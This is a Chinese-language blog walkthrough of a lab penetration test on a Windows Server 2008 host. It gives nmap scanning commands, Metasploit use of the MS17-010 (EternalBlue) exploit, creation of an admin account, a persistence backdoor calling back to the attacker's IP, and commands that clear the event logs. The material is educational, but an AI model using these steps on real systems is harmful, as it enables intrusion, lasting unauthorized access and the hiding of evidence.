記一次本地Windows-2008滲透測試

育菌頭頂涼發表於2020-12-19

一、概述

本次滲透測試是在已知Windows server 2008中存在某些漏洞的情況下,進行的驗證性測試,目的在於熟悉滲透測試流程,掌握滲透測試工具的基本使用方法。
首先明確我們的滲透測試目標:Windows server 2008(192.168.6.135)
其次明確我們的滲透測試步驟:

  • 資訊收集
  • 漏洞嗅探
  • 漏洞利用
  • 提權與維權
  • 痕跡清理
  • 滲透測試總結

最後是明確需要使用到的工具:nmap,MSF,Kali(192.168.6.128).
梳理好這些思路之後,便可以開始我們的滲透測試。

二、資訊收集

對主機的資訊收集全程使用nmap進行,作為一款強大的資訊收集工具,nmap具備了主機探測、埠掃描、服務版本掃描、主機系統指紋識別、漏洞探測等功能。
本次資訊收集主要有以下步驟:

1、主機探測

通過對目標主機所在子網進行批量探測,發現目標主機處於活躍狀態,並開放了21、80、445、3389等埠。
探測語法:nmap 192.168.6.0/24
在這裡插入圖片描述

2、系統指紋識別

探測語法:nmap -O 192.168.6.135
在這裡插入圖片描述

3、服務指紋識別

對主機進行服務指紋資訊探測,收集相關服務資訊。
探測語法:nmap -sV 192.168.6.135
在這裡插入圖片描述

4、常見漏洞探測

由於該主機開放了445、3389等埠,通過探測445埠,發現該主機存在ms17-010(永恆之藍)、ms12-020(遠端桌面協議RDP拒絕訪問)等高危漏洞。
探測語法:nmap --script=vuln 192.168.6.135
1)445埠下的永恆之藍漏洞:
在這裡插入圖片描述2)3389埠下的拒絕訪問漏洞
在這裡插入圖片描述

三、漏洞利用、提權與維權

漏洞利用、提權與維權,我們需要用到的是MSF這一個滲透測試工具,藉助其強大與全面的攻擊模組來進行攻擊,對於我們做驗證性測試的初學者來說,簡單易上手。在此次測試中僅以MS17-010(永恆之藍)漏洞進行驗證測試。

1、MS17-010漏洞利用

1)在MSF中搜尋可利用的攻擊模組(search ms17-010)
在這裡插入圖片描述2)選用相應的攻擊模組進行攻擊,並設定相關引數進行攻擊。在這裡由於目標系統是win 2008,所以使用第二個通用攻擊模組。
在這裡插入圖片描述
3)攻擊成功,獲得meterpreter後滲透模組。
在這裡插入圖片描述

2、提權與維權

進入shell,檢視當前使用者許可權已經為system許可權,為方便後面測試,在管理員使用者組新增新使用者。
在這裡插入圖片描述
使用persistence建立一個永續性的後門。
語法: run persistence -S -U -X -i 5 -p 4444 -r 192.168.6.128
詳細資訊如下:

-S:在啟動時自動啟動代理作為服務,具有系統許可權。
-U:在使用者登入時自啟動代理
-X:在系統啟動時自啟動代理
-i:每次嘗試連線之間的時間間隔(單位為 s)
-p:執行metasploit的使用者監聽的埠
-r:執行監聽程式metasploit使用者的IP
在這裡插入圖片描述

在MSF 中設定監聽程式,執行後發現對應的後門已經建立:

在這裡插入圖片描述

3、痕跡清除

在meterpreter中使用run event_manager -i命令可檢視日誌資訊,通過 run event_manager -cclearv 命令清除對登入日誌。
在這裡插入圖片描述

相關文章